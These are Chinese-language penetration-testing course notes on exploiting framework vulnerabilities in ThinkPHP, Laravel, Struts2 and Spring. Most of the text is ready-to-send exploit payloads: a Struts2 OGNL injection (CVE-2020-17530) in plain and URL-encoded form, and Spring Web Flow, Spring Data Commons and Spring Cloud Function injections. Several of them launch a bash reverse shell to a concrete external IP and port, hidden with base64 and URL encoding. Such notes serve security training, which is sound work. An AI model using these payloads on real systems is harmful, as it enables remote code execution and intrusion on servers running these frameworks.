SEC-2022版-0049-服务攻防-08-框架安全&CVE复现&Spring&Struts&Laravel&ThinkPHP

总览

框架安全受到的是框架开发者的影响，基本上框架安全是由开发者设定的，不是使用者设定的。框架爆漏洞网站就跟着爆。

知识点：

中间件及框架列表：
IIS，Apache，Nginx，Tomcat，Docker，K8s，Weblogic，JBoos，WebSphere，Jenkins ，GlassFish，Jetty，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等

1、开发框架-PHP-Laravel-Thinkphp
2、开发框架-Javaweb-St2-Spring
3、开发框架-Python-django-Flask
4、开发框架-Javascript-Node.js-JQuery

常见语言开发框架：
PHP：Thinkphp Laravel YII CodeIgniter CakePHP Zend等
JAVA：Spring MyBatis Hibernate Struts2 Springboot等
Python：Django Flask Bottle Turbobars Tornado Web2py等
Javascript：Vue.js Node.js Bootstrap JQuery Angular等

前置知识：

• 中间件安全测试流程：
  1、判断中间件信息-名称&版本&三方
  2、判断中间件问题-配置不当&公开漏洞
  3、判断中间件利用-弱口令&EXP&框架漏洞

• 应用服务安全测试流程：见图
  1、判断服务开放情况-端口扫描&组合应用等
  2、判断服务类型归属-数据库&文件传输&通讯等
  3、判断服务利用方式-特定漏洞&未授权&弱口令等

• 开发框架组件安全测试流程：
  1、判断常见语言开发框架类型
  2、判断开发框架存在的CVE问题
  3、判断开发框架CVE漏洞利用方式

实例

PHP-开发框架安全-Thinkphp&Laravel

• ThinkPHP

某些集成工具能直接扫payload，支持2到5的getshell。
CVE-2021-3129 RCE
Thinkphp-3.X RCE-5.X RCE
ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架
武器库-Thinkphp专检

• Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。

Laravel <= 8.4.2
https://github.com/zhzyker/CVE-2021-3129
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

JAVAWEB-开发框架安全-Spring&Struts2

大部分是框架下的分支组件的漏洞。

Struts2是一个基于MVC设计模式的Web应用框架
1、2020前漏洞
武器库-st2专检
2、cve_2020_17530
脚本：https://github.com/YanMu2020/s2-062
手工：

Content-Type: multipart/form-data; boundary=----1

------1
Content-Disposition: form-data; name="id"

%{(## instancemanager=## application["org.apache.tomcat.InstanceManager"]).(## stack=## attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(## bean=## instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(## bean.setBean(## stack)).(## context=## bean.get("context")).(## bean.setBean(## context)).(## macc=## bean.get("memberAccess")).(## bean.setBean(## macc)).(## emptyset=## instancemanager.newInstance("java.util.HashSet")).(## bean.put("excludedClasses",## emptyset)).(## bean.put("excludedPackageNames",## emptyset)).(## arglist=## instancemanager.newInstance("java.util.ArrayList")).(## arglist.add("id")).(## execute=## instancemanager.newInstance("freemarker.template.utility.Execute")).(## execute.exec(## arglist))}
------1--

一般将后门进行base64编码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

注意这个类型，下面正文的数据要用URL编码，才能绕过这个URL解码
在数据包中将正文进行编码，免得数据出现空格影响执行。 
Content-Type: application/x-www-form-urlencoded


编码传参：
id=%25%7b%28%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%3d%23%61%70%70%6c%69%63%61%74%69%6f%6e%5b%22%6f%72%67%2e%61%70%61%63%68%65%2e%74%6f%6d%63%61%74%2e%49%6e%73%74%61%6e%63%65%4d%61%6e%61%67%65%72%22%5d%29%2e%28%23%73%74%61%63%6b%3d%23%61%74%74%72%5b%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%75%74%69%6c%2e%56%61%6c%75%65%53%74%61%63%6b%2e%56%61%6c%75%65%53%74%61%63%6b%22%5d%29%2e%28%23%62%65%61%6e%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%63%6f%6c%6c%65%63%74%69%6f%6e%73%2e%42%65%61%6e%4d%61%70%22%29%29%2e%28%23%62%65%61%6e%2e%73%65%74%42%65%61%6e%28%23%73%74%61%63%6b%29%29%2e%28%23%63%6f%6e%74%65%78%74%3d%23%62%65%61%6e%2e%67%65%74%28%22%63%6f%6e%74%65%78%74%22%29%29%2e%28%23%62%65%61%6e%2e%73%65%74%42%65%61%6e%28%23%63%6f%6e%74%65%78%74%29%29%2e%28%23%6d%61%63%63%3d%23%62%65%61%6e%2e%67%65%74%28%22%6d%65%6d%62%65%72%41%63%63%65%73%73%22%29%29%2e%28%23%62%65%61%6e%2e%73%65%74%42%65%61%6e%28%23%6d%61%63%63%29%29%2e%28%23%65%6d%70%74%79%73%65%74%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%6a%61%76%61%2e%75%74%69%6c%2e%48%61%73%68%53%65%74%22%29%29%2e%28%23%62%65%61%6e%2e%70%75%74%28%22%65%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%22%2c%23%65%6d%70%74%79%73%65%74%29%29%2e%28%23%62%65%61%6e%2e%70%75%74%28%22%65%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%22%2c%23%65%6d%70%74%79%73%65%74%29%29%2e%28%23%61%72%67%6c%69%73%74%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%6a%61%76%61%2e%75%74%69%6c%2e%41%72%72%61%79%4c%69%73%74%22%29%29%2e%28%23%61%72%67%6c%69%73%74%2e%61%64%64%28%22%77%68%6f%61%6d%69%22%29%29%2e%28%23%65%78%65%63%75%74%65%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%29%29%2e%28%23%65%78%65%63%75%74%65%2e%65%78%65%63%28%23%61%72%67%6c%69%73%74%29%29%7d

3、cve_2021_31805
https://github.com/YanMu2020/s2-062

Spring框架是由于软件开发的复杂性而创建的。
1、cve_2017_4971-Spring Web Flow
Spring WebFlow 2.4.0 - 2.4.4
https://paper.seebug.org/322/
_eventId_confirm=&_csrf=e06e1d86-e083-45f7-b700-567b5f7f5d30&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/47.94.236.117/5566+0>%261")).start()=vulhub

2、cve_2018_1273-Spring Data Commons
Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
Spring Data REST 3.0 - 3.0.5 (Kay SR5)
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
username[## this.getClass().forName("java.lang.Runtime").getRuntime().exec("%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%30%4e%79%34%35%4e%43%34%79%4d%7a%59%75%4d%54%45%33%4c%7a%55%31%4e%6a%59%67%4d%44%34%6d%4d%51%3d%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d")]=&password=&repeatedPassword=
3、CVE-2022-22963 Spring Cloud Function Spel表达式注入
Spring Cloud Function 提供了一个通用的模型，用于在各种平台上部署基于函数的软件，包括像 Amazon AWS Lambda 这样的 FaaS（函数即服务，function as a service）平台。
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}")